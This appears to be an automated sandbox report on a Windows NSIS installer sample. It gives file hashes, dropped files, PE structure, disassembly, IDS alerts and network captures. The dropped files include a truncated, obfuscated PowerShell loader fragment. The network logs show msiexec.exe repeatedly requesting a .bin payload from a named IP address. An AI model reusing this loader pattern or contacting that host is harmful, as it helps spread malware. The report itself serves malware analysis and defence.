          MD5:CC0F7B9AF47F4CE906DD9B8D61DA2C7E
          SHA1:969034C90D3F5C1F827462DBD9F7AE3B08606C53
          SHA-256:6A250E6F0A3913C1569DD92EA8F1F7DDE6FA39EAFC09878BAA76877FED659107
          SHA-512:B8DF565AF4BCA67303DD48E6D5358F1F92DB4F057EAD2B5835C288A720139EB1E135C82C09F13302EB6115FEF90649FDB8D7062F3AEA51BD9873EDD176FA22FE
          Malicious:true
          Preview:$Overtagelsessums=$Solstraalerne;........$Udskrivningsskemaerne = @'.Fiction.kraknin$,partelR Bra.tleDiametrpa verseuDiag nabPopsieulLeadpl iHektikekScumblekMatemateNontangn,ndilapsTalehre=Submanf$Barn kaC AttachhScrublioSpydiger DrummoeL.kalisaAntiadmsA vejni;Vaabens.Pb encifProtocou Rhizocn Re uldcS,gedebtCoh gpoiConsimio Va,dbanGoniums B.mpeneKSkogr.doA.letennFastgrosIntetheeGarantikPurpurivnonsymmeilludinn Dicta s noncerbAvantgaeLowedslr Trevnee Resistg Blse.nnAnalgeti erdmennClarinigfy stene R,scalrNoncorrnSkr.elie Urbattsunenerv2Skaani 2 nrowed9Vilmers Unseclu(B anchi$videoerUservicenSundhedtDouc erhLaicisae Telefor VelarsaSmergelpSmugdrieA,ditinuSomikketTankreniValgk mcGodseksaKomposilSparrin,R spekt$LukkernMretskenaSkraldsy atsarbeDundrenrinmea s)Alarmme sanctad{ Semihe.Unsanct.Gestat.$FlykkkeSHaandbolT icompoHickmantkro,jers PherecfKontrolo m llemrT.batoxvErektioaMorphoslWagwa dtChockfueChremzlrRammenfs Rundsk flykkke(OrpinsaNAwakenieIntercadSkraalirTvangs,aRimlandkHydrome Kl
          Process:C:\Users\user\Desktop\rArz0wnYVU.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):498
          Entropy (8bit):4.28539859034843
          Encrypted:false
          SSDEEP:12:slacKykBDUoj7dMD3c6+EhAdJLFd2QAAFR1P0X5iJTXj5z3:slacKyuUGMDz+EMMQLr1u5cj5z3
          MD5:376A148120D903A92D93AA44614CBF6B
          SHA1:7616297659D1C5E996DBAB78223AB79EC7675942
          SHA-256:D68FD35D1903905BB7C7B293CC6D6417AE87F0760D930DA9684C2571ACE0E361
          SHA-512:E7878188AC40471FFB17891954CA5E4E76024B357F279CF764778B07565F4D21E17E6FAE8ABFDE0D536B33543C01BD070E8325DD422748A535F95CB7449496C4
          Malicious:false
          Preview:vatmaker revolverens cribbiting paga syndefuldere hjemmekampe kladdebogen savvrksarbejderes tusmrkes afskydningers fejlstrmmes..semimechanistic ls beundr.etruskiske fruefrakkens afgrnsningsproblemers.ulnierede afsendelsers tikronesedlen amygdaloid uroende lydighedsngtelser fortificere roil comings antidiphtheritic transparensens feberfri gruppetilhrsforholdets..tallie koeksistensers osts manipulerer auspiciousness brigatry anglisters..vella uninstructed tiderips whatnot tulle hematocathartic..
          Process:C:\Users\user\Desktop\rArz0wnYVU.exe
          File Type:data
          Category:dropped
          Size (bytes):2501720
          Entropy (8bit):0.15903029583337852
          Encrypted:false
          SSDEEP:768:V2C5EJfe/0AXq73ci4pFASl+DsVV9z5ghE+hqnTBlFduG5wrSO9L4F5PkosVRRwy:X+T
          MD5:4A778BCE8531F6BCF59D09906F08223A
          SHA1:CE723D1B1FE2CC01DD117E3132D90393D334E7F4
          SHA-256:6A69A6AFD90B1926D47A3B49FCA00F8BB7A3A13AB563CF19C4A660D8BFE908B7
          SHA-512:AD208BAA8C1C061CE7A7DB972E56176D933B139EDB9AF82C1F68EF19A52E7C1B234B6A12ABF86F7373288C648F2C4422613E5785BCC5D5634E516A6CCC3DD86A
          Malicious:false
          Preview:........................................................................................................................................................................................................................................................................................................................................................G......................c.................................................................................................k............................................e....................................................................................................................................................................}....................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\rArz0wnYVU.exe
          File Type:data
          Category:dropped
          Size (bytes):6636362
          Entropy (8bit):0.15860704412996512
          Encrypted:false
          SSDEEP:768:sujZuxPknCK3e6EcfpBnEAyPSGMx1z2pN+BGmw12ErrzfvfPbu64JMak7AzctUjP:42OKOoH
          MD5:00F6F058363C0274A04E42CCB0A61BE0
          SHA1:F121F782BCC2FD98CA6E3263D72ED388A06FDA00
          SHA-256:74867716569F21E0FA79E17B22535A97A813D394E157198300D1CB505DFD9241
          SHA-512:13D6C0641B7053017A7146691E60737B717CA7566EB99292A8D6B0772059ED35098014763ABC36E56C18BCAC2F0CF47F8B72ECB269334AA66D11437298688F21
          Malicious:false
          Preview:...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................|..................................................................................................................................................................................................................................................................t......................................................K...@..............................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\rArz0wnYVU.exe
          File Type:data
          Category:dropped
          Size (bytes):1769754
          Entropy (8bit):0.1591122503565058
          Encrypted:false
          SSDEEP:768:LmE6zL9/Y92hDNQX3eqv6BOzkqA5FgLIiirFkFBg7TookjYa+znKAhiZY4AL5kZc:+
          MD5:6C07067273E0E9952E43DC8FD61BA95F
          SHA1:329106EEAE976255FFC155E2C92BA4C73BF886E1
          SHA-256:C2610EA92F39A42FCDF2E221D22666B9ED37AFF5CD9CE73F779495A6E57D3F2F
          SHA-512:E12CDE80C564F0EB7CA637C002DA25AFA1761D3D4C90801759A8B8EBED653039EC7DF8E8A0128897101DE27BADF15EE5500E2573742342E54D2823F9C7283AA8
          Malicious:false
          Preview:....................................)...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\rArz0wnYVU.exe
          File Type:data
          Category:dropped
          Size (bytes):19373124
          Entropy (8bit):0.4174674378289027
          Encrypted:false
          SSDEEP:6144:Ou+075pguwLMjV24F8uATy8E0ydtyRQ9f363qGMvC0RnNOI+Fishd:Ou+0ptVV24+uA+f0ydkofqkNOFFisb
          MD5:0C3945EF586BB484FC3E09B6F75739F1
          SHA1:A7F8D631FE623051A681DE73F9989078D47C8EFB
          SHA-256:802B912227CA39DD7B071BC8E2F6B5934B4DB864745C1F2476F9E137C42DEC02
          SHA-512:035B6CF21C7855D9826639CC5A5B34FD568F957363583EA1F1EBB9E163A476591C0D7E9B44ED087EC02E49EED7E97F47E42F7DDCFF5EDF72C6D5B1481E20BBB0
          Malicious:false
          Preview:.0......,.......................d.......0/......./..........................................................................................................................................................................................................................................G...J...........W...j...............................................................................................................................2...........Z...=....I..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Entropy (8bit):7.784360102139571
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:rArz0wnYVU.exe
          File size:1'062'792 bytes
          MD5:2c5d3252b0c8ce91c28211e0ed75a1f5
          SHA1:9ca8101bc26b8ea199c71fed4e3aa9279535ed58
          SHA256:0a2bf76a4014ebafcf6a15f5a3e7f8ea1e2e058b4c7efbfab930454fe9cf150d
          SHA512:98d09f1b9a9288d8c85c5ccdf5f37b82523ab2ed5e3b1eda6cb788182995defc0e5f04b3713483190ff745e87b8011ad3a25bd6b664a018cc55c991afa1229be
          SSDEEP:24576:qrQi4N8YKb5NvBEd0sSCxfPNBo5PXhD7SEhWEbhxcUM8JR+i+fAZyD2f:OQi42NJEWsSCxfPzo5PRvSoW2xcUM8JZ
          TLSH:493512312755D86BC2511BF4CEF6D7397378EE843716B312E6F0BE1B3A60B92A805684
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....{.W.................b...*.......3............@
          Icon Hash:1f3f5e9adb4f2b17
          Entrypoint:0x4033b6
          Entrypoint Section:.text
          Digitally signed:true
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0x57807BD5 [Sat Jul 9 04:21:41 2016 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:4ea4df5d94204fc550be1874e1b77ea7
          Signature Valid:false
          Signature Issuer:CN=Slagsanges, E=Superfollies@Undervisningsmin.fl, O=Slagsanges, L=Oad Street, OU="Prevened Caruncula Taunting ", S=England, C=GB
          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
          Error Number:-2146762487
          Not Before, Not After
          • 28/07/2024 06:30:07 28/07/2025 06:30:07
          Subject Chain
          • CN=Slagsanges, E=Superfollies@Undervisningsmin.fl, O=Slagsanges, L=Oad Street, OU="Prevened Caruncula Taunting ", S=England, C=GB
          Version:3
          Thumbprint MD5:FF5BE4B39358AF75D02679095F4B83E4
          Thumbprint SHA-1:8F99CBD9223A8060E4E8B813A024702C4962C665
          Thumbprint SHA-256:17FC39D3F39E6CDCF1B2E192E48476E8C2D226F25B367F0A4B9D6DC555E87542
          Serial:233ABF31A4EC1AA3DFF6F51464D49DDD5A0D276F
          Instruction
          sub esp, 000002D4h
          push ebx
          push esi
          push edi
          push 00000020h
          pop edi
          xor ebx, ebx
          push 00008001h
          mov dword ptr [esp+14h], ebx
          mov dword ptr [esp+10h], 0040A230h
          mov dword ptr [esp+1Ch], ebx
          call dword ptr [004080B4h]
          call dword ptr [004080B0h]
          cmp ax, 00000006h
          je 00007FA5604F94A3h
          push ebx
          call 00007FA5604FC5FCh
          cmp eax, ebx
          je 00007FA5604F9499h
          push 00000C00h
          call eax
          mov esi, 004082B8h
          push esi
          call 00007FA5604FC576h
          push esi
          call dword ptr [0040815Ch]
          lea esi, dword ptr [esi+eax+01h]
          cmp byte ptr [esi], 00000000h
          jne 00007FA5604F947Ch
          push ebp
          push 00000009h
          call 00007FA5604FC5CEh
          push 00000007h
          call 00007FA5604FC5C7h
          mov dword ptr [0042A244h], eax
          call dword ptr [0040803Ch]
          push ebx
          call dword ptr [004082A4h]
          mov dword ptr [0042A2F8h], eax
          push ebx
          lea eax, dword ptr [esp+34h]
          push 000002B4h
          push eax
          push ebx
          push 004216E8h
          call dword ptr [00408188h]
          push 0040A384h
          push 00429240h
          call 00007FA5604FC1B0h
          call dword ptr [004080ACh]
          mov ebp, 00435000h
          push eax
          push ebp
          call 00007FA5604FC19Eh
          push ebx
          call dword ptr [00408174h]
          add word ptr [eax], 0000h
          Programming Language:
          • [EXP] VC++ 6.0 SP5 build 8804
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x22fc0.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x1030400x748
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x615d0x62000b0812166ebbd0109e7f5e007b182949False0.6616709183673469data6.450231726170125IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x80000x13a40x14004ac891d4ddf58633f14436f9f80ac6b6False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0xa0000x203380x60066b45fceba0f24d768fb09e0afe23c99False0.5026041666666666data3.9824009583068882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .ndata0x2b0000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x530000x22fc00x2300016740c02f07d7ac949bc4263a70a7935False0.4601492745535714data4.868861806606859IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_ICON0x533280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.48364485981308414
          RT_ICON0x63b500x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.5054919066638638
          RT_ICON0x6cff80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.5299952763344355
          RT_ICON0x712200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.541597510373444
          RT_ICON0x737c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.5717636022514071
          RT_ICON0x748700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.5934426229508196
          RT_ICON0x751f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.62677304964539
          RT_DIALOG0x756600x100dataEnglishUnited States0.5234375
          RT_DIALOG0x757600x11cdataEnglishUnited States0.6056338028169014
          RT_DIALOG0x758800xc4dataEnglishUnited States0.5918367346938775
          RT_DIALOG0x759480x60dataEnglishUnited States0.7291666666666666
          RT_GROUP_ICON0x759a80x68dataEnglishUnited States0.7596153846153846
          RT_VERSION0x75a100x270dataEnglishUnited States0.5208333333333334
          RT_MANIFEST0x75c800x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
          DLLImport
          KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
          USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
          ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
          2025-01-08T16:29:45.073616+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:29:55.205794+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:30:05.335139+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:30:15.471803+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:30:25.617263+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:30:35.763757+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:30:45.893758+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:30:56.036797+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:31:06.175243+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:31:16.315793+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:31:26.456822+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:31:36.597147+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:31:46.738458+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:31:56.990808+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:32:07.127948+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          2025-01-08T16:32:17.268549+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792212.162.149.9480TCP
          TimestampSource PortDest PortSource IPDest IP
          Jan 8, 2025 16:29:44.563725948 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:29:44.568495989 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:29:44.568586111 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:29:44.568684101 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:29:44.573436975 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:29:45.073539972 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:29:45.073555946 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:29:45.073616028 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:29:55.082875967 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:29:55.087691069 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:29:55.205708981 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:29:55.205722094 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:29:55.205794096 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:05.207848072 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:05.212708950 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:05.335052967 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:05.335078955 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:05.335139036 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:05.335139036 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:15.348758936 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:15.353631020 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:15.471740961 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:15.471750975 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:15.471802950 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:25.494669914 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:25.499739885 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:25.617069960 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:25.617080927 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:25.617263079 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:35.637134075 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:35.642039061 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:35.763609886 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:35.763623953 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:35.763756990 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:45.770916939 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:45.775803089 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:45.893686056 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:45.893698931 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:45.893758059 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:55.913311005 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:30:55.918262959 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:56.036700010 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:56.036712885 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:30:56.036797047 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:06.051976919 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:06.056859970 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:06.175168991 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:06.175183058 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:06.175242901 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:16.192608118 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:16.197525978 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:16.315717936 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:16.315728903 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:16.315793037 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:26.333314896 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:26.338216066 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:26.456562996 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:26.456583977 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:26.456821918 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:36.474267960 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:36.479084969 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:36.597064018 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:36.597079039 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:36.597146988 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:46.615514994 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:46.620515108 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:46.738357067 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:46.738377094 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:46.738457918 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:56.867000103 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:56.872951984 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:56.990747929 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:56.990765095 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:31:56.990808010 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:31:56.990850925 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:32:07.004817009 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:32:07.009743929 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:32:07.127852917 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:32:07.127866030 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:32:07.127948046 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:32:17.146008015 CET4979280192.168.2.5212.162.149.94
          Jan 8, 2025 16:32:17.150814056 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:32:17.268389940 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:32:17.268403053 CET8049792212.162.149.94192.168.2.5
          Jan 8, 2025 16:32:17.268548965 CET4979280192.168.2.5212.162.149.94
          • 212.162.149.94
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.549792212.162.149.9480904C:\Windows\SysWOW64\msiexec.exe
          TimestampBytes transferredDirectionData
          Jan 8, 2025 16:29:44.568684101 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:29:45.073539972 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:29:47 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
